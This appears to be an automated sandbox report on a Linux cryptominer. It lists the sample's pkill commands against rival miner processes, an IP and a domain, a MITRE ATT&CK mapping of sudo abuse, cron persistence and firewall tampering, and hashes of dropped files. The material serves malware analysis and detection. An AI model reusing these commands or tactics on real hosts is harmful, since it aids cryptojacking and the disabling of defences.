/usr/bin/pkillpkill -f irqbalance2⤵
-
-
/usr/bin/pkillpkill -f crypto-pool2⤵
-
-
/usr/bin/pkillpkill -f XJnRj2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f mgwsl2⤵
-
-
/usr/bin/pkillpkill -f pythno2⤵
-
-
/usr/bin/pkillpkill -f jweri2⤵
-
-
/usr/bin/pkillpkill -f lx262⤵
-
-
/usr/bin/pkillpkill -f NXLAi2⤵
-
-
/usr/bin/pkillpkill -f BI5zj2⤵
-
-
/usr/bin/pkillpkill -f askdljlqw2⤵
-
-
/usr/bin/pkillpkill -f minerd2⤵
-
-
/usr/bin/pkillpkill -f minergate2⤵
-
-
/usr/bin/pkillpkill -f Guard.sh2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f ysaydh2⤵
-
-
/usr/bin/pkillpkill -f bonns2⤵
-
-
/usr/bin/pkillpkill -f donns2⤵
-
-
/usr/bin/pkillpkill -f kxjd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f Duck.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f bonn.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f conn.sh2⤵
-
-
/usr/bin/pkillpkill -f kworker342⤵
-
-
/usr/bin/pkillpkill -f kw.sh2⤵
-
-
/usr/bin/pkillpkill -f pro.sh2⤵
-
-
/usr/bin/pkillpkill -f polkitd2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f acpid2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f icb5o2⤵
-
-
/usr/bin/pkillpkill -f nopxi2⤵
-
-
/usr/bin/pkillpkill -f irqbalanc12⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f minerd2⤵
-
-
/usr/bin/pkillpkill -f i5862⤵
-
-
/usr/bin/pkillpkill -f gddr2⤵
-
-
/usr/bin/pkillpkill -f mstxmr2⤵
-
-
/usr/bin/pkillpkill -f ddg.20112⤵
-
-
/usr/bin/pkillpkill -f wnTKYg2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f deamon2⤵
-
-
/usr/bin/pkillpkill -f disk_genius2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f sourplum2⤵
-
-
/usr/bin/pkillpkill -f polkitd2⤵
-
-
/usr/bin/pkillpkill -f nanoWatch2⤵
-
-
/usr/bin/pkillpkill -f zigw2⤵
-
-
/usr/bin/pkillpkill -f devtool2⤵
-
-
/usr/bin/pkillpkill -f devtools2⤵
-
-
/usr/bin/pkillpkill -f systemctI2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f watchbog2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
-
-
/usr/bin/pkillpkill -f sustes2⤵
-
-
/usr/bin/pkillpkill -f xmrig2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f xmrig-cpu2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f 121.42.151.1372⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f sysguard2⤵
-
-
/usr/bin/pkillpkill -f networkservice2⤵
-
-
/usr/bin/pkillpkill -f sysupdate2⤵
-
-
/usr/bin/pkillpkill -f phpguard2⤵
-
-
/usr/bin/pkillpkill -f phpupdate2⤵
-
-
/usr/bin/pkillpkill -f networkmanager2⤵
-
-
/usr/bin/pkillpkill -f /tmp/init12.cfg2⤵
-
-
/usr/bin/pkillpkill -f kieuanilam.me2⤵
-
-
/usr/bin/pkillpkill -f init12.cfg2⤵
-
-
/usr/bin/pkillpkill -f nginxk2⤵
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5727479ef7cedf30c03459bec7d87b0f0
SHA12082e7f715f058acab2398d25d135cf5f4c0ce41
SHA25629872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA5124cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba
-
Filesize
825B
MD5bf2b2dbe177af125ffe40723c547d7c2
SHA1ec586d9739e97b901a36c6351ab5a6067808c892
SHA256f24352f20027e2087bb75c02c14e10e34438c1bde606c204b590f95d65230e94
SHA51223348c5445ddc89de02f68b4e44319877716d1cc064678901602041de266343328827938715868d67d95cd31a7c967f99105ce949142cc63cd90d1bf88344ed5
-
Filesize
1KB
MD5fcdcb48635229f65095188362c1f8981
SHA189d0508c22c4d09926507987ef3d22fe603d51f0
SHA2563041896a6ee02b0e7d78af2008eac07941f35be0559ae65acaf9e70b65bfda98
SHA512082854ae093ce467d87eaa238a378f90499bc1dc9ffee34ff58568bd6b6c43bb18a23a1871978f784024a3fe1f7c286f7d2ce36d8c0df16a15b312dd922ba859
-
Filesize
248B
MD53d360b833502335186d9dc7e8277303c
SHA1e2565fd9f43349f31e1ac091319afee95ce88c10
SHA2568841021026a994f2c1ca470913d7d0ff0f0d636d8e7f4016bebc31ff32c4c687
SHA512b7d233ab739f12ba37b3481444f3421c5a5712444cdad372b72626c5ebc6052666fad13a94ca3b4fc7186c9ca0fe4b877f5a973a9ac1d301155d98a4d1077680
-
Filesize
248B
MD552745796c1ee8c82255a4da5ce8f86dc
SHA1b282a3397caaedbea91fe98aa64ab6a47b281e84
SHA2561c8172cf66ba1c762a0d3e349d2e0ebbe937bbfa0d8625f3b2fd9a9fcaf12ced
SHA51218f63d7ea031d619c25dee6d059592d444de40c75ac9451ad9607305b872f505bedd9f6c6b4fbab1bdf83e06c21b17295b35d29cac7671e4dda6f1a3f0efacbf
-
Filesize
248B
MD568a0996240c519645c4aefa9d36bf373
SHA13906130dd6d575bc9e28970695548faf261fa325
SHA25649236beb6149405996f7cb6118652d436fd7db9aaa4a05831669117417de6e02
SHA5120bff8b156726db4877a249307dc5d5f52e54e2149a4acb0e5ed1b11e12a9bbb2a03f626056623f67bfd002d475274e6e882032f9507171ac95f161178459cbff
-
Filesize
248B
MD5b2d4b8c34e6cd08cd613ebc86d69c38d
SHA1b0609d643cbffb8b41cb290ab9fdcb1fcc05c89a
SHA256c04e6f46d11db6d0ad585556c7a4a418c021eaf2d21ceff4391e3543ba726dc0
SHA512aba7cbde8a019a91c710492bc5e991c411461b706c9b296527de27164099c396edba3c4847aa50441db48f82e0c87ac36137b5304ad6ec3116f9162e1247c6cb
-
Filesize
248B
MD5ce82d0384a5306f71e62d7b7973a377e
SHA14007ede99f4828fa58496f55d165dcd5c9120180
SHA256718700544947a47a54095fe17be957a97f80873f162c91f8cf19990b08f73d1e
SHA512133309684643063062a6d8865d2ff0077cbe78922b2eca8f2b7cce46d8a8ce28d24d1e62d1305f91e41194448b29ffac8a820fcf2cf9ad44ce4b95b67a46709c
-
Filesize
248B
MD57efa75442fcc90748b1d83c082071833
SHA17cb8d5c12d8092ae1eea63fa0df8853617a352e8
SHA2565cea56a258d1d580c626d0e7444bf7d465be8637ebc1f196ac1321cda2804bce
SHA512379ed487f3a75d17ff72afc94e9d26e84b0dc5ffa397e612a41168c9a1255a29f1192c12a78eb7742746e0a639a701c5642ce3d4f064d13481d3218666cd2f1b
-
Filesize
128B
MD58faade01569297ef4ea3d6cdddc38458
SHA17d7a990846af6ef8a21a823af89249ef4ece5d42
SHA256cb5ae6c307fd8f67dea2edde0413f17102e0ab42a761279c5c366e56ad48c3b9
SHA5120280480eba87d2bcf0cbabed632a2df15afe057f391f6697540842084e6abb1cb9bc1b2e6869f8266e07acc8444e0eea3c399d49fb36d5d3202937385cb60841
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
146B
MD5604a543b5ae7826af991b5cfbdc4d25d
SHA18575f069a279f0f0c06be72920b7c68481f68895
SHA2561f09dd97859f796c73e40ee5dbef61f7a938d4483552b84ecf283bc68709240e
SHA51211006b417409dc4a53864979003a080eca5eff778bb68142ecdf1310951b2aefd195e744301c18c0911b60f48f2850fbf1d2d2d07fa05e4834c4ccadabbd6a8f
-
Filesize
915B
MD534e7d4b5b8e0ed37556ead3d444024a8
SHA165981a0709ffc3d79a725b6695b22a4e683cf6d6
SHA25631f79ecff93f336a2d0a5b44832852185947e116acdf27854bde95524ba47a42
SHA512adf5b6a8371840b17dd21ae67c2cac89b6d170f1a83fab0c5729ce15edd1409e49ac2423027f3423e98ed79603522b3796384dc309e8c420091fa8aed3ac2ba5
-
Filesize
288B
MD54409aa88145a717010e63926219ed1db
SHA1d724455dc28225d02bd175258b2965946a518fdd
SHA25645adb2d4adecfef85b53c435070996d3165b9f758d364b8099ab6f1c70b0eed3
SHA51275e93f8730e1812132ed9ab036a682bc12d4104b921baf09114b47b039e1f3bc73d04fe551729e116da98f62317debe698581a86fa35cdb58b2eccdaff860fc2
-
Filesize
89B
MD571f642e05e272a65d6a800f4eede0cee
SHA18057a99ec4d65cea80b6d99638bd14135a52556a
SHA256156d98f1a5ee5d96e7f78ac832d333652584b3c3883bfa27daaf7d2a36fc7313
SHA512560794c753ea75c7ca1e0ba8a92673def45b97602345c0a4f18f3ed36e307b3d58024f9753797b2562f409d25f91342959157d6b40c74bd1a911ab556fbb29a5
-
Filesize
288B
MD57912ef3b22d72722e57834b112c83feb
SHA131fa067366fbb5e3ad01935dc10092d4f1935ecb
SHA2562122a830f06f358dd9d06a9b86cbdc1f55cfb29b15530264412b1ed869b44c83
SHA512fbde99d12c31a56e98db9d4c9160c9a0173480c14a85b545c5f9e45212a0dcf70114a02f802512f31bcb93c0bf2d4c5e304261493a38c7c07bd55df823baa970
-
Filesize
89B
MD551c0645a4d8b55d5d6bf4b4d87629d59
SHA12c4204f5c6c137c5a10dac43817ad4f52d12efd4
SHA25650db377b42a78bcedbe5a3607d917188d45f19209657942f299cc5d56fdf9fb1
SHA512b5249f0c4531d500d3b8fa6672a68f9baea64ce6690193b8918bc51b1df3c9f0d928bc4c470c187b0f401c245efca7f41e6df42c6ef14881cfff3f62bd5dc1f3
-
Filesize
5.7MB
MD5b3039abf2ad5202f4a9363b418002351
SHA10ceb8ffb0be23b808b534d744440f4367e17b9c5
SHA256787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
SHA5128b1a1003a021d0f69b9295f496bf550932ce85b096ca7057632756348da1354c2b104ff36e901b27def030b79749c8fc7f54163d6195e5e0cb9b357353ee654e